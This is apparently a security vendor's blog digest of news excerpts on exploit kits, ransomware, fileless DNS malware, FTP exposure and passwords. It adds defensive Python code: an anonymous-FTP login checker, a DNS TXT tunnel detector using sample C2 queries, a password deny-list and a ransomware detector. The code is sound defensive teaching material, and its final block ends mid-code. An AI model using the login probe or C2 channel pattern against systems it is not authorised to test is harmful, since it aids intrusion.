The Neptune Exploit kit is being used to turn computers into cryptocurrency miners, with traffic directed to the exploit kit using a hiking-themed malvertising campaign. Exploit kit activity has fallen this year, although these web-based attacks still pose a significant threat. Exploit kits are web-based toolkits that probe browsers and plugins for vulnerabilities that can be exploited to download malware. Simply visiting a website hosting an exploit kit is all it takes for malware to be silently downloaded. Protecting against exploit kit attacks requires browsers, plugins and extensions to be kept fully up to date. However, even fully patched browsers can be vulnerable, since exploit kits can also include exploits for zero-day vulnerabilities that have not yet been patched. Acceptable usage policies can help organizations to prevent exploit kit attacks, although website visitors are often redirected to malicious sites from legitimate websites. One of the main ways this happens is through malvertisements. Many high traffic websites include advertising blocks that display third-party adverts. The advertising networks serve adverts which are displayed on member sites, with the site owners earning money from ad impressions and click throughs. While the advertising networks have measures in place to vet advertisers, oftentimes cybercriminals succeed in submitting malicious adverts. Those adverts are then pushed out and displayed on legitimate websites. Clicking one of those malicious adverts will see the user directed to a webpage hosting the exploit kit. Exploit kits are usually used to download Trojans, ransomware and other malicious code, but the Neptune exploit kit is being used to download cryptocurrency miners. Infection will see the computer’s processing power used to mine the Monero cryptocurrency, hogging the infected computer’s resources and slowing down the performance of the machine.
The latest Neptune exploit kit campaign uses hiking club-related adverts to drive traffic to landing pages hosting the Neptune exploit kit, which in turn uses HTML and Flash exploits to download malware. These adverts closely mimic genuine domains. FireEye reports...

India’s Central Board of Secondary Education Recommends School Web Filtering Technology

India’s Central Board of Secondary Education is urging all CBSE-affiliated schools to take action to improve safety for students, including implementing school web filtering technology to keep students safe online. The Internet is home to an extensive range of potentially harmful material that can have a major impact on young developing minds. Parents can take action to keep their children safe at home by using parental control filters. However, students must receive similar or greater levels of protection while at school. School web filtering technology can prevent students from deliberately or accidentally viewing obscene material such as pornography, child pornography or images of child abuse, and other categories of potentially harmful website content. CBSE has warned school boards that when students access this material it is “detrimental to themselves, their peers and the value system.” School web filtering technology should also be implemented to prevent students from engaging in illegal activities online via school IT devices. CBSE-affiliated schools have been advised to develop guidelines for safe Internet use, make this information available to students and display the rules prominently. However, without school web filtering technology, these policies would be easy to ignore. A technological solution ensures students wishing to engage in illegal activities online, or view harmful website content, will be prevented from doing so. Prevention is only one aspect of Internet control. Schools should also set up a monitoring system to discover when individuals are attempting to bypass Internet usage policies. A web filtering solution should therefore have the capability to generate reports of attempts to access prohibited material, to allow schools to take action.
Schools have also been advised to sensitize parents about safety norms and even go as far as suggesting disciplinary action be taken when children are discovered to have attempted to access inappropriate material. While many school systems around the world have implemented school web filtering technology, CBSE is advising affiliated schools in India to go one step further and restrict...

Cybersecurity Best Practices for Law Firms

Law firm hacking incidents are up and recent attacks have shown cybersecurity best practices for law firms are not being adhered to. Unless cybersecurity defenses are improved, it is too easy for hackers to gain access to sensitive data. Cybercriminals have their sights firmly set on lawyers, or more specifically, the treasure trove of highly sensitive data stored on their computers and networks: data that, in the wrong hands, could be used for blackmail. Clients share highly sensitive information with their legal teams. Lawyers store company secrets, employment contracts and PII, banking details, financial projections, medical records, and naturally information about current and future lawsuits. All of this information is highly valuable to hackers and can be used for blackmail, sold to competitors, or used for all manner of nefarious purposes. It is therefore no surprise that hackers want to attack law firms and that they are increasingly doing just that. Cyberattacks are not only about stealing data. It can also be lucrative to prevent lawyers from gaining access to their clients’ files. Ransomware attacks on law firms can result in sizable payments for the keys to unlock the encryption. For the most part, malware and ransomware attacks on law firms are entirely preventable. Simply adopting standard cybersecurity best practices for law firms will prevent the majority of attacks. One recent ransomware attack on a Providence law firm resulted in a ransom payment of $25,000 being made to the attackers to regain access to the firm’s data. The incident is also a good example of how damaging those attacks can be. Even though payment was made, the law firm lost access to its files for three months, essentially preventing the firm from conducting any business. Lost billings alone cost the firm around $700,000. Malware and ransomware attacks on law firms are common, although they are underreported for obvious reasons.
One incident that was covered in the press was the malware attack on DLA Piper. The attack involved NotPetya, the wiper malware that caused chaos for many organizations around the globe in June. DLA Piper lost access to its data causing huge losses....

Study Reveals Misplaced Confidence in Cyber Response Plans

Confidence in cyber response plans doesn’t appear to be lacking, according to a new study conducted by Deloitte. However, that does not mean organizations are prepared for cyberattacks when they occur. The survey revealed that while confidence is high and IT professionals believe they are well prepared to deal with attacks, their cyber response plans may not be effective. The only way to determine whether cyber response plans will function as planned is to conduct regular tests. If plans are not tested, organizations will not be able to determine with any degree of certainty whether their plans will be effective. As the recent Ponemon Institute Cost of a Data Breach study confirmed, the ability to respond quickly to a data breach can reduce breach resolution costs considerably. For that to happen, a response plan must have been developed before the breach is experienced, and that plan must be effective. The Deloitte study revealed that 76% of business executives were confident that in the event of a cyberattack they would be able to respond quickly and implement their cyberattack response policies. Yet, the study also revealed that 82% of respondents had not tested their response plans in the past year. They had also not documented their plans with business stakeholders in the past year. A lot can change in a year. New software solutions are implemented, and configurations change, as do personnel. Only regular testing will ensure that plans work and staff know their roles when an attack occurs. Cyberattack simulations are a useful tool to determine how attack response plans will work in practice. Plans often look great on paper but fail when put into practice. Running simulations every 6 months will help to ensure that a fast and effective response to a cyberattack is possible. However, the survey showed that only 46% of respondents conduct simulations twice a year or more frequently. A data breach can have dire consequences for a company.
The study showed that many companies are most concerned about disruptions to business processes as a result of a cyberattack, although loss of trust and tarnishing of a brand should be of more concern. When a data...

95% of Companies Have Employees Bypassing Security Controls

A recent insider threat intelligence report from Dtex has revealed the vast majority of firms have employees bypassing security controls put in place to limit Internet activity. Those controls may simply be policies that prohibit employees from accessing certain websites during working hours, or in some cases, technical controls such as web filtering solutions. Dtex discovered during its risk assessments on organizations that 95% of companies had employees that were using virtual private networks (VPNs) to access the Internet anonymously, with many installing the Tor Browser or researching ways to bypass security controls online. The researchers discovered that in some cases, employees were going as far as installing vulnerability testing tools to bypass security controls.

Why Are Employees Bypassing Security Controls?

Employees bypassing security controls is a major problem, but why is it happening? The report indicates 60% of attacks involve insiders, with 22% of those attacks malicious in nature. The first week of employment and the final week before an employee leaves carry the greatest chance of data theft: 56% of organizations said they had discovered potential data theft during those two weeks. During these times there is the greatest risk of employees attempting to bypass security controls for malicious reasons. In many cases, VPNs and anonymizers are used to allow employees to access websites without being tracked. Many companies have policies in place that prohibit employees from accessing pornography in the workplace. Similar policies may cover gaming and gambling websites and other categories of website that serve no work purpose. Some employees choose to ignore those rules and use anonymizers to prevent their organization from having any visibility into their online activities. The report indicates 59% of organizations had discovered employees were accessing pornographic websites at work.
There are many reasons why companies prohibit the accessing of pornography at work. It is a drain of productivity, it can lead to the development of a hostile working environment, and from a security standpoint, it is a high-risk activity....

Free Bart Ransomware Decryptor Released

Bitdefender has developed a free Bart ransomware decryptor that allows victims to unlock their files without paying a ransom. Bart Ransomware was first detected in June 2016. The ransomware variant stood out from the many others due to its ability to encrypt files even without an Internet connection. Most ransomware variants rely on a connection to their command and control server to obtain or register their public-private key pairs; Bart ransomware does not. Only the decryption process requires an Internet connection, to transfer the ransom payment and receive the decryption key. Bart ransomware posed a particular threat to corporate users. For most ransomware, command and control communications can potentially be blocked at the firewall, preventing the encryption of files. Because Bart needs no C&C contact, corporate users were at risk even behind such controls. Bart ransomware was believed to have been developed by the gang behind Locky and the Dridex banking Trojan. Bart ransomware shared a significant portion of code with Locky, was distributed in the same manner and used a ransom message very similar to that used by Locky. As with Locky, Bart ransomware encrypted a wide range of file types. While early versions of the ransomware variant were fairly unsophisticated, later versions saw flaws corrected. Early versions of the ransomware variant blocked access to files by locking them in password-protected zip files. The initial method of locking files was ‘cracked’ by AVG, although only by recovering the password using brute force methods. In order for the brute force method to work, a copy of an encrypted file along with its unencrypted original was required. In later versions of the ransomware, the use of zip files was dropped and AVG’s decryption technique was rendered ineffective. The encryption process used in the later versions was much stronger and the ransomware had no known flaws.
Until Bitdefender developed the latest Bart Ransomware decryptor, victims had two choices – recover encrypted files from backups or pay the attackers’ ransom demand. Fortunately, Bitdefender was able to create a Bart Ransomware decryptor from keys supplied by Romanian police which were obtained during a criminal...

Cybersecurity Warning for Healthcare Providers Issued by FBI

The FBI has issued a cybersecurity warning for healthcare providers on the use of FTP servers. FTP servers should have authentication controls in place to ensure only authorized individuals can access stored data. However, when FTP servers are in anonymous mode, access can be gained with a generic username and password. In some cases, access is possible without a password. The usernames that provide access could be as simple as ‘FTP’ or ‘anonymous’ and lists of usernames can be easily found on the Internet. Cycling through a short list of possible usernames is likely to take seconds or minutes at the most and access to stored data can be gained without any hacking skills. Data stored on an anonymous FTP server could be accessed by anyone. The FBI cybersecurity warning for healthcare providers cites research conducted by the University of Michigan in 2015 that shows the scale of the problem. The study revealed there are more than one million FTP servers in use around the world that allow anonymous access. Any data stored on those servers could be freely accessed by the public. Should those FTP servers contain sensitive data such as protected health information, it could easily be stolen and used for malicious purposes. Firewalls and other perimeter defenses serve to protect networks and EHRs from cyberattacks, yet FTP servers could be a gaping hole in an organization’s defenses. Many healthcare providers use FTP servers to allow data to be easily shared with business associates and other healthcare entities. Yet, if authentication controls are not used they are a data breach waiting to happen. The FBI has warned all medical and dental organizations to ensure that no sensitive data are stored on anonymous FTP servers and advises healthcare organizations to check if their servers are running in anonymous mode. 
Smaller organizations without the resources of large healthcare systems are more likely to have overlooked this vulnerability, although checks should be performed by all healthcare organizations. The cybersecurity warning for healthcare providers explains the risks extend beyond the theft of sensitive data. If access to the servers can be gained, FTP...
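The check the FBI is asking for, trying an anonymous login against your own FTP servers, takes only a few lines. The following is an added example and is not part of the FBI notice or the original article: it uses Python's ftplib to make the same anonymous login attempt a scanner would make, and ships with a constructed in-process fake FTP server (speaking only USER, PASS and QUIT) so it can run offline. Point check_anonymous_ftp() at the real hosts and ports from an asset inventory to audit them.

```python
import ftplib
import socket
import threading
from dataclasses import dataclass


@dataclass
class FtpCheck:
    host: str
    port: int
    anonymous_login: bool  # True when USER anonymous / PASS anonymous@ was accepted
    detail: str            # banner and final reply (or error), for the findings report


def check_anonymous_ftp(host, port=21, timeout=5.0):
    """Try an anonymous login against one FTP server and report the outcome.

    ftplib.login() with no arguments sends USER anonymous and PASS anonymous@,
    which is exactly what an attacker's scanner tries first.
    """
    ftp = ftplib.FTP(timeout=timeout)
    try:
        ftp.connect(host, port)
        banner = ftp.getwelcome()
        try:
            reply = ftp.login()           # a 230 reply means anonymous was let in
            ftp.quit()
            return FtpCheck(host, port, True, f"{banner} -> {reply}")
        except ftplib.error_perm as err:  # 530 (or similar) means anonymous is refused
            ftp.close()
            return FtpCheck(host, port, False, f"{banner} -> {err}")
    except ftplib.all_errors as err:      # unreachable host, timeout, protocol error
        return FtpCheck(host, port, False, f"error: {err}")


class FakeFtpServer:
    """Constructed in-process stand-in for an FTP server so the check runs offline.

    It implements just enough of the protocol for a login attempt: USER, PASS, QUIT.
    """

    def __init__(self, allow_anonymous):
        self.allow_anonymous = allow_anonymous
        self._listener = socket.socket()
        self._listener.bind(("127.0.0.1", 0))   # ephemeral port on loopback
        self._listener.listen(1)
        self.port = self._listener.getsockname()[1]
        threading.Thread(target=self._serve_one, daemon=True).start()

    def _serve_one(self):
        conn, _ = self._listener.accept()
        self._listener.close()
        with conn:
            conn.sendall(b"220 fake-ftp ready\r\n")
            user = None
            for raw in conn.makefile("rb"):
                cmd, _, arg = raw.decode("ascii", "replace").strip().partition(" ")
                cmd = cmd.upper()
                if cmd == "USER":
                    user = arg.lower()
                    conn.sendall(b"331 Please specify the password.\r\n")
                elif cmd == "PASS":
                    if self.allow_anonymous and user in ("anonymous", "ftp"):
                        conn.sendall(b"230 Login successful.\r\n")
                    else:
                        conn.sendall(b"530 Login incorrect.\r\n")
                elif cmd == "QUIT":
                    conn.sendall(b"221 Goodbye.\r\n")
                    break
                else:
                    conn.sendall(b"502 Command not implemented.\r\n")


if __name__ == "__main__":
    # Replace the two fake servers with real hosts and ports to run the audit.
    for srv in (FakeFtpServer(allow_anonymous=True), FakeFtpServer(allow_anonymous=False)):
        print(check_anonymous_ftp("127.0.0.1", srv.port))
```

A server that answers 230 to the anonymous login is the finding; the banner and reply are kept in the result so the report shows exactly what the server said. The check does not list or download anything, which keeps it safe to run against production systems.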

FBI Chief Issues Ransomware Advice for Healthcare Providers

At a recent cybersecurity conference, Director of the FBI James B. Comey gave valuable ransomware advice for healthcare providers to help them tackle the growing threat of attack. Comey confirmed that ransomware is now the biggest cybersecurity threat for the healthcare industry. Healthcare providers must be prepared for an attack and be able to respond quickly to limit the harm caused. Ransomware is used to encrypt files and databases to prevent the victim from accessing essential data. Since healthcare providers need access to patient health information in order to provide medical services, healthcare providers are being extensively targeted. If data access is essential, victims are more likely to pay ransom demands. However, Comey explained that ransoms should never be paid. If a ransom is paid, this only encourages cybercriminals to attack more businesses. The payment of a ransom sends a message to other cybercriminals that the attacks are profitable. Ransomware can be distributed indiscriminately via spam email or by malicious websites. Cybercriminals also install ransomware once access to a computer system has been gained and data have been exfiltrated. Tackling the problem involves implementing a range of cybersecurity defenses to prevent attacks and ensuring data can be recovered and business processes can continue if ransomware is installed. In the case of the latter, data backups are essential. All critical data should be backed up on a daily basis at a minimum. Data backups can also be encrypted by ransomware, so it is essential that backup devices are not left connected to computers or servers. Data should ideally also be backed up in the cloud. One of the best pieces of ransomware advice for healthcare providers is to prepare for an attack now. Healthcare organizations should not wait until a ransomware infection occurs to decide how to respond.
Not only should policies be developed that can be implemented immediately following a ransomware attack, business continuity plans must be tested prior to a disaster occurring. The same goes for backups. Many organizations have been attacked with ransomware only to discover that they have been unable...

New Fileless Malware Hides Communications in DNS Queries

A new fileless malware has been detected that uses DNS to receive commands and send information to the attackers’ command and control server. The stealthy communication method together with the lack of files written to the hard drive makes this new malware threat very difficult to spot. The attack method, termed DNSMessenger, starts with a phishing email, as is the case with many of the new malware threats now being detected. The host is infected via a malicious Word document. Opening the Word document will display a message informing the user that the document has been protected using McAfee Secure. The user is required to enable content to view the document; however, doing so will call a VBA function that defines the PowerShell command and includes the malicious code. As is the case with other forms of fileless malware, since no files are written to the hard drive during the infection process, the threat is difficult to detect. Fileless malware is nothing new; in fact, it is becoming increasingly common. What makes this threat unique is the method of communication it uses. The malware is able to receive commands via DNS, which is usually used to look up the Internet Protocol addresses associated with domain names. The malware sends and receives information using DNS TXT queries and responses. DNS TXT records are commonly used as part of the controls organizations have in place to identify phishing emails and verify the sender of a message – Sender Policy Framework (SPF) and Domain-based Message Authentication, Reporting and Conformance (DMARC). The attackers can send commands to the malware in the TXT responses and the malware can send the attackers the output of the commands via the same channel, encoded in the names it queries. Even if an organization has blocked direct outbound DNS to unapproved servers, the malware will still be able to communicate with the attackers’ C2 infrastructure, because its queries are relayed by the organization’s own recursive resolver to the attackers’ authoritative name server. While many organizations inspect the contents of web traffic, relatively few inspect the content of DNS requests.
The malware is therefore likely to operate unnoticed. Further, the Cisco Talos team that detected the malware reports that only 6/54 AV engines detected the threat, although ClamAV did identify the...
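Because DNSMessenger's traffic is a stream of ordinary-looking TXT queries relayed by the corporate resolver, the place to look for it is the resolver's query log. The following added example is not code from Cisco Talos or the original article: it scores constructed query-log lines per client and registered domain on three signals a TXT-based C2 channel produces (TXT volume, entropy of the leftmost label, and how many queried names are unique) and shows why legitimate TXT traffic such as a mail relay's SPF and DMARC lookups does not trip it. The log layout, addresses and the name c2-domain.test are assumptions for illustration, and registered_domain() assumes two-label domains rather than a public-suffix list.

```python
import math
from collections import defaultdict

# Constructed resolver log excerpt, one query per line: "<timestamp> <client> <qname> <qtype>".
# Real resolver logs (BIND, Unbound, Windows DNS debug logging) carry the same fields in
# their own layouts; adapt the split() below. The first cluster is a mail relay doing SPF
# and DMARC lookups; the second is what a TXT-based C2 channel looks like.
SAMPLE_DNS_LOG = """\
2017-03-02T10:15:01Z 10.0.0.25 example.com TXT
2017-03-02T10:15:01Z 10.0.0.25 _dmarc.example.com TXT
2017-03-02T10:15:02Z 10.0.0.25 example.com TXT
2017-03-02T10:15:03Z 10.0.0.25 example.com TXT
2017-03-02T10:15:04Z 10.0.0.25 example.com TXT
2017-03-02T10:15:05Z 10.0.0.25 example.com TXT
2017-03-02T10:15:06Z 10.0.0.7 www.example.org A
2017-03-02T10:16:00Z 10.0.0.9 a1b2c3d4e5f6a7b8c9d0.c2-domain.test TXT
2017-03-02T10:16:02Z 10.0.0.9 9f8e7d6c5b4a39281706.c2-domain.test TXT
2017-03-02T10:16:04Z 10.0.0.9 3c7a1e9b5d0f2468ace1.c2-domain.test TXT
2017-03-02T10:16:06Z 10.0.0.9 5e2d9a0c4f7b1836cafe.c2-domain.test TXT
2017-03-02T10:16:08Z 10.0.0.9 b8d4f0a6c2e91357dead.c2-domain.test TXT
"""


def shannon_entropy(s):
    """Bits of entropy per character; encoded data scores well above dictionary words."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname):
    """Last two labels. Assumption: no public-suffix list, so co.uk-style names need one."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def detect_txt_tunnels(log_text, min_txt_queries=5, min_entropy=3.0, min_unique_ratio=0.8):
    """Return (client, domain) pairs whose TXT queries look like a data channel.

    A tunnel sends many TXT queries, packs data into the leftmost label (high
    entropy), and almost never repeats a name, because a repeated name would be
    answered from the resolver's cache instead of reaching the attacker.
    """
    stats = defaultdict(lambda: {"txt": 0, "subdomains": set(), "entropy_sum": 0.0})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[3] != "TXT":
            continue
        _, client, qname, _ = parts
        domain = registered_domain(qname)
        qname = qname.rstrip(".").lower()
        sub = qname[: -len(domain) - 1] if len(qname) > len(domain) else ""
        st = stats[(client, domain)]
        st["txt"] += 1
        st["subdomains"].add(sub)
        st["entropy_sum"] += shannon_entropy(sub.split(".")[0])
    alerts = []
    for (client, domain), st in sorted(stats.items()):
        n = st["txt"]
        avg_entropy = st["entropy_sum"] / n
        unique_ratio = len(st["subdomains"]) / n
        if n >= min_txt_queries and avg_entropy >= min_entropy and unique_ratio >= min_unique_ratio:
            alerts.append({"client": client, "domain": domain, "txt_queries": n,
                           "avg_label_entropy": round(avg_entropy, 2),
                           "unique_subdomain_ratio": round(unique_ratio, 2)})
    return alerts


if __name__ == "__main__":
    for alert in detect_txt_tunnels(SAMPLE_DNS_LOG):
        print(alert)
```

On the sample, only 10.0.0.9 querying c2-domain.test is reported: five TXT queries, every name unique, and labels with close to four bits of entropy per character. The mail relay makes six TXT queries to example.com, but they repeat two names and carry no encoded data, so it stays below the thresholds. Tune the thresholds on a week of your own resolver logs before alerting on them.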

Calls for Ransomware Protection for Universities to Be Augmented

Following a massive increase in ransomware attacks, security experts have called for ransomware protection for universities to be augmented.

Ransomware: A Major Threat to Universities the World Over

Ransomware has become one of the biggest data security threats. The healthcare industry has been extensively targeted, as have the financial services, manufacturing, telecoms, and just about every other industry sector. Now, attacks are being conducted on higher education establishments with increased vigor. Universities are attractive targets. They store vast quantities of data. Researchers, teaching staff, and students alike need access to data on a daily basis. Without access, all work grinds to a halt. That means ransom demands are likely to be paid. Secondly, universities use thousands of computers and have tens of thousands of users. Cybersecurity defenses may be good, but with so many individuals with access to Internet-facing computers, protecting against targeted attacks on those individuals is a major challenge. Staff and students are being actively targeted as they are the weak links in the security chain. Then there is the issue of academic freedom. While many industries have implemented web filtering solutions to limit the websites that can be visited by staff and students, many universities have been reluctant to restrict Internet access. In a similar vein, university networks tend to be more open than in the business world. Businesses tend to segment their networks and severely restrict access, so if an attack occurs the damage is limited. Open networks tend to result in huge numbers of files and devices being encrypted if an attacker breaks through the security perimeter.

Ransomware Protection for Universities Clearly Lacking

The number of university ransomware attacks that have been reported by institutions in the United States and Canada in 2016 has reached alarming levels.
Many of those universities have been forced to pay the ransom demands to restore access to files. Last year, the University of Calgary was forced to pay $16,000 to restore access after a ransomware attack. Carleton University was also attacked with ransomware, as was Los Angeles...

Poor Cybersecurity Practices to Avoid

Poor cybersecurity practices exist at many US organizations, and they are allowing hackers and other cybercriminals to gain access to corporate networks, steal data, and install malware and ransomware. Businesses can implement highly sophisticated cybersecurity defenses, but even multi-million-dollar protections can be easily bypassed if poor practices persist. This month two reports have been issued that highlight one of the biggest flaws in the cybersecurity defenses of US enterprises: poor password hygiene. The purpose of passwords is to prevent unauthorized access to sensitive data, yet time and again data breaches occur because of end users' poor choice of passwords and bad password practices. Earlier this month, SplashData released its annual report on the worst passwords of 2016. The report details the 25 most commonly used poor passwords, and this year's edition showed that little had changed year on year. Users are still very bad at choosing strong passwords. Top of this year's list were two absolute howlers: 123456 and password. Numbers three and four were no better: 12345 and 12345678. Even number 25 on the list, password1, would only delay an attacker by a few seconds, since password-guessing tools try common words with digits appended as a matter of course. Another study also highlighted the extent to which Americans practice poor password hygiene. Pew Research asked 1,040 US adults about their password practices. 39% of respondents said they used the same, or very similar, passwords for multiple online accounts, while 25% admitted to using very simple passwords because they were easier to remember. 56% of 18-29-year-old respondents said that they shared their passwords with other individuals, while 41% of all respondents said they shared passwords with family members. The results of this survey were supported by later research conducted by TeleSign, which found a very blasé attitude to online security among U.S. citizens.
Although 80% of respondents admitted to being concerned about online security (and half of those claimed to have had an online account hacked in the past year), 73% of respondents' online accounts are guarded by duplicate passwords and...
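
The SplashData list above shows what a deny-list check needs to catch: not just the exact strings, but the trivially decorated forms users reach for (password1, P@ssw0rd!). The following is an added example, not code from this article or from SplashData; the deny-list is a small constructed sample and the normalization rules (case folding, stripping trailing digits and punctuation, undoing common leet substitutions) are a starting point rather than a complete policy:

```python
"""Password deny-list check with normalization.

Added example (not code from the original article). The deny-list is a
constructed sample that includes the SplashData entries named above; a real
deployment would load a large breached-password corpus instead.
"""
import re
import unicodedata

# Constructed sample deny-list. Production lists run to millions of entries.
DENY_LIST = {
    "123456", "password", "12345", "12345678", "qwerty", "123456789",
    "football", "1234", "1234567", "baseball", "welcome", "abc123",
    "letmein", "monkey", "login", "dragon", "passw0rd", "master",
    "hello", "admin", "princess", "starwars", "qwertyuiop", "iloveyou",
}

# Common "leet" substitutions, undone: p@ssw0rd -> password.
LEET = str.maketrans("@$!013457", "asioleast")

# Leading punctuation, or a trailing run of digits/punctuation, that users
# bolt onto a weak base word to satisfy complexity rules (password1, Welcome123!).
DECORATION = re.compile(r"^[\W_]+|[\d\W_]+$")


def candidates(pw: str) -> set:
    """Return the forms of pw that are compared against the deny-list."""
    base = unicodedata.normalize("NFKC", pw).casefold()
    forms = {base}
    stripped = DECORATION.sub("", base)
    if stripped:
        forms.add(stripped)
    # Undo leet substitutions on every form collected so far.
    forms |= {f.translate(LEET) for f in list(forms)}
    return forms


def check_password(pw: str, min_length: int = 8) -> tuple:
    """Return (accepted, reason). min_length follows the NIST SP 800-63B floor of 8."""
    if len(pw) < min_length:
        return False, f"shorter than {min_length} characters"
    if len(set(pw)) == 1:
        return False, "single repeated character"
    hits = candidates(pw) & DENY_LIST
    if hits:
        return False, f"matches known-bad password {sorted(hits)[0]!r} after normalization"
    return True, "ok"


if __name__ == "__main__":
    for sample in ["123456", "password1", "P@ssw0rd123!", "Tr0ub4dor&3",
                   "correct horse battery staple"]:
        print(f"{sample!r:32} -> {check_password(sample)}")
```

A real deployment swaps the sample set for a breached-password corpus and keeps the normalization, since attackers' wordlists apply exactly these mutations before trying each entry.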

Web Filters in Libraries are Not Just About Internet Control

There is an important reason why the use of web filters in libraries is increasing. The cost of providing computers with Internet access to patrons is not inconsiderable, yet in order to qualify for discounts under the E-Rate program, libraries must implement a web filter to comply with CIPA regulations. Libraries must use the web filter to block obscene images (pornography), images of child abuse, and any other graphics that could cause minors to come to harm. However, there is another reason why the use of web filters in libraries is important, and it has been clearly demonstrated this week in St. Louis, MO.

Web Filters in Libraries are Not Only About Internet Control

This week, every computer in the St. Louis Public Library System was taken out of action. Visitors were still able to visit the library and use the books, but little else. All book borrowing stopped, since it was not possible for library staff to log loans on the checkout system. Patrons were also prevented from gaining access to the Internet. Even the email system was locked and taken out of action. What kind of computer malfunction causes an entire network of computers to stop working? The answer is ransomware. Ransomware is malicious software developed with one sole purpose: to encrypt system and data files so that they cannot be accessed. Once it has been downloaded and run, ransomware locks files with strong encryption. The attacker then issues a ransom demand, offering the unique keys needed to decrypt the files in exchange for payment. Typically, attackers demand around $500 for each computer that has been attacked, payable in a cryptocurrency such as Bitcoin (which is pseudonymous rather than truly anonymous, but still difficult to trace to an individual). In the case of the St. Louis Public Library system, the ransom demand was $35,000. All 700 of the library system's computers, across 16 locations, were attacked and encrypted. Some ransomware variants also act as information stealers.
Fortunately for the library, its inventory was unaffected and payment card information and other personal information of patrons were not stolen. The St. Louis Public Library system will not be paying the extortionate ransom demand. It has instead opted for the only...

10 Tips for Preventing Malware Infections

If you use a computer, you are at risk of having your device infected with malware; however, listed below are some useful tips for preventing malware infections. Unfortunately, signature-based anti-malware software is far less effective at preventing infections than in years gone by. Malware developers are now using a wide range of strategies and techniques to prevent traditional anti-malware solutions from detecting and blocking infections. Rely on anti-malware or anti-virus software alone and sooner or later you may find your device has been compromised, your keystrokes are being logged, and your, or your organization's, data are being stolen. However, there are some straightforward strategies that you can adopt to prevent malware infections and keep your computer, and your network, malware-free.

10 Tips for Preventing Malware Infections

Backup your data

OK, a data backup will not prevent a malware infection, but it can help you recover if your computer is infected with ransomware or if your data are corrupted as a result of an infection, or of malware removal. The only way to recover from some infections is to wipe the system and restore it from a previously known safe point, so you must have a safe point to restore from. Perform nightly backups; you then stand to lose at most 24 hours of data. Keep at least one copy offline or otherwise unreachable from the machines being backed up, since ransomware that can reach a mapped backup share will encrypt the backups as well, and test that the backups can actually be restored.

Keep your malware definitions up to date

Anti-malware software may not be as effective as it once was, but you do need to give it a fighting chance. If you do not keep your definitions fully up to date you are asking for trouble. This may sound obvious, but many organizations delay updating malware definitions or forget to set the software to update automatically on all devices.

Never click on links or open email attachments from unknown senders

Cybercriminals target employees because it is far easier to gain access to a corporate network if an employee bypasses their organization's defenses and installs malware.
All it takes is for one employee to install malware for attackers to gain a foothold in a network. Ensure that all employees receive anti-phishing training and have at least basic IT security skills. Most data breaches start...

How to Prevent Ransomware Attacks

Cybercriminals have embraced ransomware and have been increasingly targeting businesses, yet many business leaders are unsure how to prevent ransomware attacks. Consequently, the risk from ransomware is not being effectively managed, and that may prove costly. Ransomware is a form of malware that encrypts files on local machines, network drives, and servers. Any computer that is connected to the Internet can potentially be infected, and even a computer without Internet access may have its files encrypted if it is networked. The latest ransomware variants are capable of spreading laterally within a network and encrypting the data on hundreds of devices. Files required for critical business processes may be encrypted and made inaccessible, and a successful attack can result in a company's operations grinding to a halt. A healthcare ransomware attack can result in patients' health information becoming inaccessible. An attack on a pharmaceutical company may lock files necessary for drug manufacture, which could affect the quality of products. Law offices may lose essential client information. Few businesses could continue to operate at their full potential during a ransomware attack. The loss of files can prove extremely expensive, far more than the cost of any ransom payment, so many companies are left with little alternative but to pay the ransom demand. Ransom payments are actually made surprisingly frequently. According to a recent study conducted by IBM, 70% of businesses that experienced a ransomware infection ended up paying the attackers to supply the keys to unlock their data. Half of those businesses paid more than $20,000 while 20% paid more than $40,000. Even when the ransom is paid there is no guarantee that a working key will be supplied, so files may be lost forever. One healthcare organization in the United States recently discovered that files can all too easily be lost forever.
Three months after ransomware was installed on one of its servers and critical patient health information was encrypted, Desert Care Family and Sports Medicine has still not been able to unlock the encryption nor...
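
Both this article and the St. Louis library piece above describe the same tell-tale behaviour: one process rewriting large numbers of files in a short time and leaving ciphertext behind. The following is an added example, not code from this article or from any product, of a detector built on that behaviour. It runs over a constructed list of file-write events (process name, path, bytes written) of the kind an endpoint agent or file-server audit log would provide; the process names and paths are hypothetical:

```python
"""Behavioural ransomware detection over file-write events.

Added example, not code from the original article. The events are constructed
in-line to stand in for what an endpoint agent or file-server audit log would
emit; process names and paths are hypothetical.
"""
import math
import random
from collections import defaultdict, deque


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: encrypted or compressed data sits close to 8.0, text near 4-5."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def detect_encryption_bursts(events, window=10.0, min_files=20,
                             entropy_threshold=7.0, min_fraction=0.8):
    """Alert once per process that rewrites at least min_files distinct files
    inside `window` seconds where at least min_fraction of the writes look
    like ciphertext. Events are dicts with keys t, proc, path, data."""
    recent = defaultdict(deque)          # process -> (time, path, high_entropy?)
    alerted, alerts = set(), []
    for ev in sorted(events, key=lambda e: e["t"]):
        proc = ev["proc"]
        q = recent[proc]
        q.append((ev["t"], ev["path"], shannon_entropy(ev["data"]) >= entropy_threshold))
        while q and ev["t"] - q[0][0] > window:   # slide the window forward
            q.popleft()
        if proc in alerted:
            continue
        files = {path for _, path, _ in q}
        if len(files) < min_files:
            continue
        fraction = sum(1 for _, _, hi in q if hi) / len(q)
        if fraction >= min_fraction:
            alerts.append({"proc": proc, "t": ev["t"], "files": len(files),
                           "high_entropy_fraction": round(fraction, 2)})
            alerted.add(proc)
    return alerts


def sample_events():
    """Constructed sample: an editor saving a few documents, a build job writing
    many text files quickly, and a process rewriting spreadsheets as
    high-entropy blobs with a new extension (the ransomware pattern)."""
    rng = random.Random(7)                     # deterministic stand-in for ciphertext
    text = b"Quarterly figures and notes for the board pack. " * 64
    events = []
    events += [{"t": 1.0 + i, "proc": "winword.exe",
                "path": f"\\\\fs1\\finance\\report{i}.docx", "data": text} for i in range(3)]
    events += [{"t": 20.0 + i * 0.1, "proc": "build.exe",
                "path": f"C:\\build\\out\\mod{i}.log", "data": text} for i in range(40)]
    events += [{"t": 60.0 + i * 0.25, "proc": "svchost_update.exe",
                "path": f"\\\\fs1\\finance\\file{i}.xlsx.locked",
                "data": rng.randbytes(4096)} for i in range(30)]
    return events


if __name__ == "__main__":
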